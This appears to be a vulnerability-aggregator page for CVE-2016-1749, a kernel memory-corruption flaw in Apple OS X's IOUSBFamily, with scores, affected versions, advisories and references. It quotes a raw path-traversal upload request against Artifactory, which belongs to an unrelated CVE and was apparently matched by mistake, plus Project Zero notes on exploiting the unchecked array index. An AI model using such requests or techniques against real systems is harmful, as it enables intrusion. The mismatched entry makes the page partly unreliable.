CVE-2016-1749
published 2016-03-24CVE-2016-1749: IOUSBFamily in Apple OS X before 10.11.4 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption)…
PriorityP344high7.8CVSS 3.0
AVLACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
4.06%
89.4th percentile
IOUSBFamily in Apple OS X before 10.11.4 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | <= 10.11.3 | — |
| apple | os_x_el_capitan_v10.11.4_and_security_update_2016-002 | — | — |
CVSS provenance
nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-65cj-hv6f-f8rv: IOUSBFamily in Apple OS X before 10
ghsa_unreviewed·2022-05-17
CVE-2016-1749 [HIGH] CWE-119 GHSA-65cj-hv6f-f8rv: IOUSBFamily in Apple OS X before 10
IOUSBFamily in Apple OS X before 10.11.4 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
Apple
CVE-2016-1749: OS X El Capitan v10.11.4 and Security Update 2016-002
vendor_apple·CVSS 7.8
CVE-2016-1749 [HIGH] CVE-2016-1749: OS X El Capitan v10.11.4 and Security Update 2016-002
Apple Security Update: About the security content of OS X El Capitan v10.11.4 and Security Update 2016-002
Product: OS X El Capitan v10.11.4 and Security Update 2016-002
CVE: CVE-2016-1749
Component: CVE-ID
No detection rules found.
Exploit-DB
Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution
exploitdb·2018-04-26·CVSS 9.8
CVE-2016-10036 [CRITICAL] Jfrog Artifactory < 4.16 - Arbitrary File Upload / Remote Command Execution
Jfrog Artifactory alert(/Vulnerable/)" within the file app.html :
POST /artifactory/ui/artifact/upload HTTP/1.1
Host: [removed]
User-Agent: [removed]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 1749
Content-Type: multipart/form-data; boundary=---------------------------6085305491255810029929874687
Connection: close
-----------------------------6085305491255810029929874687
Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/artifactory/webapp/app.html"
Content-Type: application/zip
alert(/Vulnerable/)
-----------------------------6085305491255810029929874687--
(It is also possible to exploit this vulnerability to create JSP files within
Exploit-DB
Apple Mac OSX Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort
exploitdb·2016-03-23
CVE-2016-1749 Apple Mac OSX Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort
Apple Mac OSX Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort
---
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=728
External Method 36 of IOUSBInterfaceUserClient is _AbortStreamPipe.
It takes two scalar inputs and uses the second one as an array index to read a pointer
to a C++ object without checking the bounds then calls a virtual method on it.
Furthermore there's no check that the array pointer is non-null; if it is then we can get a
controlled offset-from-zero read; since our controlled dword will be multiplied by 8 to
index the array this means we can easily get the kernel to dereference a controllable
userspace address.
In this case a value of 0xf0f0f0f0 leads to the kernel reading an IOKit object pointer from
0x787878780. T
No writeups or analysis indexed.
http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.htmlhttp://www.securitytracker.com/id/1035363http://www.zerodayinitiative.com/advisories/ZDI-16-206https://support.apple.com/HT206167https://www.exploit-db.com/exploits/39607/http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.htmlhttp://www.securitytracker.com/id/1035363http://www.zerodayinitiative.com/advisories/ZDI-16-206https://support.apple.com/HT206167https://www.exploit-db.com/exploits/39607/
2016-03-24
Published